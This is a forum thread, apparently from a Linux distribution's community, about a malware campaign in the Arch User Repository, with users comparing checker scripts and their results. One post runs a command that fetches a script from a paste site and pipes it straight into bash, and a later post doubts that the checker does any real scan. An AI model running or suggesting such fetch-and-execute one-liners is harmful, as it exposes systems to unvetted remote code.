Malicious AUR packages

Nothing malicious found on my install.

I guess I won’t update AUR packages at all for a week or so. As it is still an ongoing event and its uncertain if it is already over.

That github repo not only contains a script to check if you’ve got one of the malicious packages on your system, but also provides an overview of the situation. And some recommendations what to do if you’re affected.

Overall, as the attack vector included identity theft / impersonation of an legitimate kde maintainer via git commit forgery, I’ll order a drink for that maintainer, symbolically. As it is no joke when you’re in the middle of an supply-chain attack and you’re reputation is in limbo, more or less. But luckily that suspicion has been clarified by the arch team that it has been impersonation.

AUR is not for the faint of hearts!

690×362 40.8 KB

So, we got it. Please stop now, as it does not contribute any meaningfull anymore, thx.

Don’t patronize me, alright! Move on and get on with your own life, Regular!

To be honest I agree with @milkytwix you have been gloating about this quite enough.

What I said above goes for you too.

If you or anyone thinks I am breaking any rules of the forum, flag me!

But don’t you or anyone put yourselves in a position to patronize me. Get it?

If you don’t want to be patrionized why are you trying to patronize me I wonder.

One of the members over at Garuda posted a script to check for infected packages…

[eosblu@machina Desktop]$ ./maltest.sh

Checking for infected AUR packages (494 total)...
Clean: None of the known infected packages were installed within 48 hours of the campaign.

Guys, don’t bury actual meaningful contributions and shared information about the actual situation with random noise. Be reasonable.

The link to the script to check for malicious packages in the AUR that I’ve posted early originated from the arch linux discord channel, in case you didn’t trust an private github account that may seem arbitrary and not actually affiliated to the arch dev team directly, which is actually an concern that might raise some eyebrows. I guess that it will be updated in case there are new findings. At least the latest commit is only a few hours old.

Earlier today, similar script originating from a moderator on Cachy’s Forum:

If I understand correctly it’s over 900 now
(New Wave of malicious packages?)

Edit: according to some other thing (some GitHub script) it seems to be 1577 as of right now

FYI: Arch User Repository hit by a large-scale malware campaign, with maintainers racing to roll back malicious commits and lock out bad actors.

If you’re an Arch Linux user, today would not be a good day to download and install packages from AUR.

Edit: according to some other thing (some GitHub script) it seems to be 1577 as of right now

Link from Garuda Forum member…

[eosblu@machina Desktop]$ bash ./maltest2.sh

Checking for infected AUR packages (1595 total)...
Clean: None of the known infected packages were installed within 2 days of the campaign.

this test came up NO INFECTION

will try the Garuda one nexr

I couldn’t find a link in that thread anywhere for this maltest.sh file. will read thread again

This link is the one that is updating the list, I just renamed the script.

The number added as of now is 1,606.

thank you kindly

edit:

$ bash <(curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh)

Checking for infected AUR packages (1595 total)...

Clean: None of the known infected packages were installed within 2 days of the campaign.

this one judged me clean in like 1/100th of a second—not a scan whatsoever; just a date check I guess

better start counting AUR packages, that aren’t infected

This actually seems like a solid use case for AI. If human moderators can’t manually review every package build, an AI system could at least scan for suspicious patterns like unexpected sed, awk, or in this case NPM usage and flag them for human approval. And with the recent DDoS issues, they might also want to consider a P2P approach.